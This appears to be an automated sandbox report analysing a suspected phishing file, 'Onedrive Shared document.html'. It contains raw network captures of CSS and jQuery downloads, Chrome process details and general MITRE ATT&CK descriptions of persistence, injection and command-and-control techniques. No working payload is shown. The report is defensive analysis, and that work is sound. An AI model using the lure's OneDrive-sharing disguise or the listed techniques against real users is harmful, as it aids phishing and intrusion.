2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 61 64 65 72 25 37 42 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 25 33 41 31 36 70 78 25 33 42 62 6f 72 64 65 72 2d 73 74 79 6c 65 25 33 41 6e 6f 6e 65 25 33 42 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 25 33 41 30 25 37 44 2e 73 65 63 74 69 6f 6e 2e 69 74 65 6d 2d 73 65 63 74 69 6f 6e 25 32 30 2e 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 25 37 42 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 30 25 33 42 66 6f 6e 74 2d 73 69 7a 65 25 33 41 31 35 70 78 25 33 42 6c 69 6e 65 2d 68 65 69 67 68 74 25 33 41 32 30 70 78 25 33 42 66 6f 6e 74 2d 77 65 69 67 68 74 25 33 41 36 30 30 25 33 42 66 6f 6e 74 2d 73 69 7a 65 25 33 41 2e 39 33 37 35 72 65 6d 25 33 42 6c 69 6e 65 2d 68 65 69 67 68 74 25 33 41 31 2e 32 35 72 65 6d 25 33 42 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 25 33 41 Data Ascii: ader%7Bmargin-bottom%3A16px%3Bborder-style%3Anone%3Bpadding-bottom%3A0%7D.section.item-section%20.section-title%7Bcolor%3A%23000%3Bfont-size%3A15px%3Bline-height%3A20px%3Bfont-weight%3A600%3Bfont-size%3A.9375rem%3Bline-height%3A1.25rem%3Bpadding-bottom%3A
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 61 72 67 69 6e 25 33 41 30 25 33 42 6c 69 6e 65 2d 68 65 69 67 68 74 25 33 41 31 2e 34 32 38 35 37 25 37 44 2e 6d 6f 64 61 6c 2d 62 6f 64 79 25 37 42 70 6f 73 69 74 69 6f 6e 25 33 41 72 65 6c 61 74 69 76 65 25 37 44 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 25 33 41 62 65 66 6f 72 65 25 32 43 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 25 33 41 61 66 74 65 72 25 37 42 63 6f 6e 74 65 6e 74 25 33 41 25 32 32 25 32 30 25 32 32 25 33 42 64 69 73 70 6c 61 79 25 33 41 74 61 62 6c 65 25 37 44 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 25 33 41 61 66 74 65 72 25 37 42 63 6c 65 61 72 25 33 41 62 6f 74 68 25 37 44 2e 6d 6f 64 61 6c 2d 73 63 72 6f 6c 6c 62 61 72 2d 6d 65 61 73 75 72 65 25 37 42 70 6f 73 69 74 69 6f 6e 25 33 41 61 62 73 6f 6c 75 74 65 25 33 42 74 6f 70 25 33 41 Data Ascii: argin%3A0%3Bline-height%3A1.42857%7D.modal-body%7Bposition%3Arelative%7D.modal-footer%3Abefore%2C.modal-footer%3Aafter%7Bcontent%3A%22%20%22%3Bdisplay%3Atable%7D.modal-footer%3Aafter%7Bclear%3Aboth%7D.modal-scrollbar-measure%7Bposition%3Aabsolute%3Btop%3A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	151.101.130.137	443	744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:41:50 UTC	358	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-07 12:41:50 UTC	612	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 2433323 Date: Tue, 07 Jan 2025 12:41:50 GMT X-Served-By: cache-lga21947-LGA, cache-nyc-kteb1890094-NYC X-Cache: HIT, HIT X-Cache-Hits: 363, 0 X-Timer: S1736253710.400005,VS0,VE1 Vary: Accept-Encoding
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-01-07 12:41:50 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 2344, Parent PID: 908

General

Target ID:	0
Start time:	07:41:42
Start date:	07/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Onedrive Shared document.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 744, Parent PID: 2344

General

Target ID:	2
Start time:	07:41:46
Start date:	07/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1956,i,12266085751408568076,8214220606909640829,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Onedrive Shared document.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 2344, Parent PID: 908

General

Chronological Activities

Analysis Process: chrome.exePID: 744, Parent PID: 2344

General

Chronological Activities

Disassembly

Windows Analysis Report
Onedrive Shared document.html